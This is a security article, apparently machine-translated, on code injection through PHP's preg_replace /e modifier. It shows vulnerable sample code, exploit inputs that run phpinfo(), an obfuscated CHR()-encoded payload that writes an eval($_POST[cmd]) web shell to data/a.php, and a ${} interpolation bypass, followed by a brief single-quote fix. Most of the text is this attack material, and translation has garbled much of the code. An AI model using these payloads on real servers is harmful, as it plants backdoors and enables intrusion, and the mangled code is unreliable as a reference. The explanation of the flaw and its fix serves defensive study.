Preg_replace function prototype:
Mixed preg_replace (mixed pattern, mixed replacement, Mixed Subject [, int limit])
Note:
The/e modifier enables preg_replace () to treat the replacement parameter as PHP code (after appropriate reverse references are replaced ). Tip: Make sure that the replacement constitutes a valid PHP code string. Otherwise, PHP will report a syntax parsing error in the row containing preg_replace.
Example:
<? PHP
Preg_replace ("/(</?) (W +) ([^>] *>)/E ",
"\ 1. strtoupper (\ 2). \ 3 ",
$ Html_body );
?>
This converts all HTML tags in the input string to uppercase.
Security Threat Analysis:
Generally, the subject parameter is generated by the client. The client may construct malicious code, for example:
<?
Echo preg_replace ("/test/E", $ _ Get ["H"], "jutst test ");
?>
If we submit? H = phpinfo (), phpinfo () will be executed (using the/e modifier, preg_replace will execute the replacement parameter as PHP code ).
What if we submit the following code?
? H = eval (CHR (1, 102 ). CHR (1, 112 ). CHR (1, 117 ). CHR (1, 116 ). CHR (1, 115 ). CHR (40 ). CHR (1, 102 ). CHR (1, 111 ). CHR (1, 112 ). CHR (1, 101 ). CHR (1, 110 ). CHR (40 ). CHR (39 ). CHR (1, 100 ). CHR (97 ).
CHR (1, 116 ). CHR (97 ). CHR (47 ). CHR (97 ). CHR (46 ). CHR (1, 112 ). CHR (1, 104 ). CHR (1, 112 ). CHR (39 ). CHR (44 ). CHR (39 ). CHR (1, 119 ). CHR (39 ). CHR (41 ). CHR (44 ). CHR (39 ). CHR (60 ).
CHR (63 ). CHR (1, 112 ). CHR (1, 104 ). CHR (1, 112 ). CHR (32 ). CHR (1, 101 ). CHR (1, 118 ). CHR (97 ). CHR (1, 108 ). CHR (40 ). CHR (36 ). CHR (95 ). CHR (80 ). CHR (79 ). CHR (83 ). CHR (84 ). CHR (91 ).
CHR (99 ). CHR (1, 109 ). CHR (1, 100 ). CHR (93 ). CHR (41 ). CHR (63 ). CHR (62 ). CHR (39 ). CHR (41 ). CHR (59 ))
The plaintext corresponding to the ciphertext is: fputs (fopen (data/a. php, W), <? PHP eval ($ _ post [cmd])?> );
The execution result is to generate a trojan file a. php In the/data/directory.
Another difficult example:
<?
Function Test ($ Str)
{
}
Echo preg_replace ("/S * [PHP] (. + ?) [/PHP] S */ies ", 'test (" \ 1 ") ', $ _ Get [" H "]);
?>
Submit? H = [PHP] phpinfo () [/PHP]. Will phpinfo () be executed?
Certainly not. After regular expression matching, the replacement parameter is changed to 'test ("phpinfo") '. In this case, phpinfo is only treated as a string parameter.
Is there a way to execute it?
Of course. In this case, if we submit? H = [PHP] {$ {phpinfo ()} [/PHP], phpinfo () will be executed. Why?
In PHP, if a double quotation mark contains a variable, the PHP interpreter replaces it with the result after the variable is interpreted. Variables in single quotation marks are not processed.
Note: Functions in double quotation marks are not executed and replaced.
Here we need to construct a special variable through {$ {}, 'test ("{$ {phpinfo ()}}")', to make the function run ($ {phpinfo ()} will be interpreted and executed ).
You can perform the following tests first:
Echo "{$ {phpinfo ()}"; phpinfo will be successfully executed.
How can this vulnerability be prevented?
Change 'test ("\ 1") 'to "test (' \ 1')", then '$ {phpinfo ()} 'is treated as a normal string (the variables in single quotes are not processed ).
References:
PHP manual-preg_replace http://www.yesky.com/imagesnew/software/php/zh/function.preg-replace.html
Uchome <= 2.0 background getwebshell vulnerability http://www.5luyu.cn/article/jishu/708.htm
"Preg_replace vulnerability exploitation details" http://www.dbgger.com /? Id = 334 (security focus of this website's giant image)
Attached test code: